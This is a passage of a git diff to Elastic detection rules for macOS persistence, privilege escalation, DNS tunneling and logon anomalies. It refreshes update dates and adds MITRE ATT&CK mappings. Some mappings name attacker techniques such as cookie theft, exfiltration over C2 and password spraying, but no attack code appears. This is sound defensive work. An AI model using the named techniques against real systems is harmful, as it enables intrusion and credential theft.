b/rules/macos/persistence_emond_rules_process_execution.toml index 4a0d2d1ddfe..d311934e05e 100644 --- a/rules/macos/persistence_emond_rules_process_execution.toml +++ b/rules/macos/persistence_emond_rules_process_execution.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,19 +125,69 @@ The Event Monitor Daemon (emond) on macOS is a service that executes commands ba [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.014" name = "Emond" reference = "https://attack.mitre.org/techniques/T1546/014/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.014" +name = "Emond" +reference = "https://attack.mitre.org/techniques/T1546/014/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index 5e06d5edddf..aff54dfac33 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,19 +97,36 @@ In macOS environments, the root account is typically disabled to enhance securit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 49dd1c7435c..a6a9cae0368 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,36 +101,41 @@ Launch agents and daemons in macOS are background services that start at login o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index 46944a678eb..d790a233ae0 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,26 +101,31 @@ Folder Action scripts on macOS automate tasks by executing scripts when folder c [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 40020db35c3..4de5c5b0c7f 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,14 +108,18 @@ In macOS environments, login and logout hooks are scripts executed automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index 7603cbada1f..e85b2d8c0c3 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -67,26 +67,36 @@ event.category:file and host.os.type:macos and not event.type:"deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1647" name = "Plist File Modification" reference = "https://attack.mitre.org/techniques/T1647/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_manual_chromium_extension_loading.toml b/rules/macos/persistence_manual_chromium_extension_loading.toml index 245e2cd90cc..07e4a9a4fee 100644 --- a/rules/macos/persistence_manual_chromium_extension_loading.toml +++ b/rules/macos/persistence_manual_chromium_extension_loading.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,25 +86,43 @@ process where host.os.type == "macos" and event.action == "exec" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1176" +name = "Software Extensions" +reference = "https://attack.mitre.org/techniques/T1176/" - [[rule.threat.technique]] - name = "Software Extensions" - id = "T1176" - reference = "https://attack.mitre.org/techniques/T1176/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Credential Access" - id = "TA0006" - reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique]] +id = "T1185" +name = "Browser Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1185/" - [[rule.threat.technique]] - name = "Steal Web Session Cookie" - id = "T1539" - reference = "https://attack.mitre.org/techniques/T1539/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml index 2c5cd8c4634..af2fe4da7d7 100644 --- a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml +++ b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,20 +73,26 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 44791980400..f3d28e5dedf 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,14 +101,18 @@ file where host.os.type == "macos" and event.action == "modification" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.002" +name = "Screensaver" +reference = "https://attack.mitre.org/techniques/T1546/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml b/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml index fac9eb9b6b7..541eca18fa0 100644 --- a/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml +++ b/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,17 +88,35 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" - [[rule.threat.technique.subtechnique]] - name = "Installer Packages" - id = "T1546.016" - reference = "https://attack.mitre.org/techniques/T1546/016/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index eff66a14bca..20a55491fb9 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,14 +102,18 @@ Atom, a popular text editor, allows customization via the `init.coffee` script, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index ca5bd4627c0..154da364854 100644 --- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,26 +99,41 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.004" +name = "Elevated Execution with Prompt" +reference = "https://attack.mitre.org/techniques/T1548/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index f295bcc10c8..495b1af36f8 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,6 +104,7 @@ In macOS environments, the `security_authtrampoline` process is used to execute [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -113,27 +114,46 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.004" name = "Elevated Execution with Prompt" reference = "https://attack.mitre.org/techniques/T1548/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 0b7b102ae56..9652b050d48 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,19 +101,28 @@ In macOS environments, tools like `dscl` and `dseditgroup` manage user group mem [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml index eb4046a403c..70e4595fc79 100644 --- a/rules/macos/privilege_escalation_user_added_to_admin_group.toml +++ b/rules/macos/privilege_escalation_user_added_to_admin_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.investigate]] @@ -103,19 +103,28 @@ configuration where host.os.type == "macos" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml index 677898f0c23..6e0dfd19402 100644 --- a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml +++ b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -116,14 +116,36 @@ DNS tunneling exploits the DNS protocol to covertly transmit data between a comp - Coordinate with IT and security teams to apply necessary patches and updates to the affected system to close any vulnerabilities exploited by the attacker.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml b/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml index bc5e9a0574f..f2fe9d6cf36 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -119,19 +119,49 @@ DNS is crucial for translating domain names into IP addresses, enabling network - Update and enhance DNS monitoring rules to detect similar unusual DNS activity in the future, ensuring rapid identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.004" name = "DNS" reference = "https://attack.mitre.org/techniques/T1071/004/" - +[[rule.threat.technique]] +id = "T1568" +name = "Dynamic Resolution" +reference = "https://attack.mitre.org/techniques/T1568/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml index 390ff8b41e2..a48e00fa0ee 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -123,19 +123,36 @@ The 'Unusual Web Request' detection leverages machine learning to identify rare - Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to better detect and block uncommon URLs associated with command-and-control activities.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml index 254e2a72443..30ca95d7d81 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -133,14 +133,23 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml index e2c5d123724..9fad9a30e9a 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -135,14 +135,31 @@ The 'Spike in Logon Events' detection leverages machine learning to identify ano - Enhance monitoring and alerting mechanisms to detect similar spikes in logon events in the future, ensuring rapid response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml index 3305439fe96..1e36cec12c9 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -127,22 +127,30 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" @@ -153,10 +161,7 @@ id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense 